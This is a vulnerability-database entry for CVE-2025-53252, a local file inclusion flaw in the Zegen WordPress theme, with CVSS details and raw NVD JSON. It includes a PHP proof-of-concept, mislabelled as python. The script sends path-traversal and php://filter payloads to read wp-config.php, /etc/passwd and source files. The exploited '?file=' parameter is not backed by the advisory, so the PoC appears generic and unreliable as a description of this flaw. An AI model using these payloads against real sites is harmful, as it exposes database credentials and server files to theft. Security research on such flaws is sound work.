Security Vulnerability Report
中文
CVE-2025-53252 CVSS 7.5 HIGH

CVE-2025-53252

Published: 2025-11-06 16:15:56
Last Modified: 2026-04-27 18:16:21

Description

Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in zozothemes Zegen zegen allows PHP Local File Inclusion.This issue affects Zegen: from n/a through <= 1.1.9.

CVSS Details

CVSS Score
7.5
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H

Configurations (Affected Products)

No configuration data available.

Zegen WordPress Theme <= 1.1.9

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<?php /** * CVE-2025-53252 PoC - Zegen WordPress Theme LFI * Target: Zegen Theme <= 1.1.9 * Vulnerability: Local File Inclusion */ $target = 'http://target-site.com/'; // LFI payload to read wp-config.php $lfiPayload = $target . '?file=../../wp-config.php'; // Path traversal to read /etc/passwd $passwdPayload = $target . '?file=../../../../etc/passwd'; // Read PHP source files (basic bypass) $sourcePayload = $target . '?file=php://filter/convert.base64-encode/resource=index.php'; // Example: Read wp-config.php $ch = curl_init(); curl_setopt($ch, CURLOPT_URL, $lfiPayload); curl_setopt($ch, CURLOPT_RETURNTRANSFER, true); curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true); curl_setopt($ch, CURLOPT_TIMEOUT, 30); $response = curl_exec($ch); $httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE); curl_close($ch); echo "Target: $lfiPayload\n"; echo "HTTP Code: $httpCode\n"; echo "Response:\n$response\n"; ?>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-53252", "sourceIdentifier": "[email protected]", "published": "2025-11-06T16:15:56.010", "lastModified": "2026-04-27T18:16:21.320", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Control of Filename for Include/Require Statement in PHP Program ('PHP Remote File Inclusion') vulnerability in zozothemes Zegen zegen allows PHP Local File Inclusion.This issue affects Zegen: from n/a through <= 1.1.9."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "HIGH", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.6, "impactScore": 5.9}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-98"}]}], "references": [{"url": "https://patchstack.com/database/Wordpress/Theme/zegen/vulnerability/wordpress-zegen-theme-1-1-9-local-file-inclusion-vulnerability?_s_id=cve", "source": "[email protected]"}]}}